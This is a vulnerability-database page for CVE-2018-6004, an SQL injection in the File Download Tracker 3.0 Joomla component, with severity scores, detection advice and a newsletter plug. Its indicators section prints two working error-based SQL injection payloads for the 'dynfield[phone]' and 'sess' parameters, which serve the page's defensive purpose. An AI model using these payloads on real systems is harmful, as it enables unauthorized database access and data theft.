cbcvebase.
CVE-2018-6004
published 2018-02-17

CVE-2018-6004: SQL Injection exists in the File Download Tracker 3.0 component for Joomla! via the dynfield[phone] or sess parameter.

PriorityP263critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.70%
84.1th percentile
SQL Injection exists in the File Download Tracker 3.0 component for Joomla! via the dynfield[phone] or sess parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
techsolsystemfile_download_tracker

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://localhost/[PATH]/index.php?dynfield[phone]=[SQL]&option=com_dtracker&task=save
urlhttp://localhost/[PATH]/index.php?option=com_dtracker&layout=download&sess=[SQL]
commanddynfield[phone]=%251%2527%2520AND%2520(SELECT%204323%20FROM(SELECT%20COUNT(*),CONCAT(version(),(SELECT%20(ELT(4323=4323,1))),database(),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%2527%2525%2527%3D%2527
commandsess=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -
  • Monitor HTTP requests to Joomla index.php containing 'option=com_dtracker&task=save' with a 'dynfield[phone]' parameter containing SQL metacharacters (quotes, AND, SELECT keywords).
  • Monitor HTTP requests to Joomla index.php containing 'option=com_dtracker&layout=download' with a 'sess' parameter containing SQL metacharacters (quotes, AND, SELECT keywords).
  • The SQL injection payloads target INFORMATION_SCHEMA.PLUGINS and information_schema.tables to enumerate database version and schema — alert on these strings appearing in query parameters.
  • ·Affected version is specifically File Download Tracker 3.0 for Joomla!; detections scoped to 'com_dtracker' component parameter are version-specific and may not apply to patched or differently-named forks.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.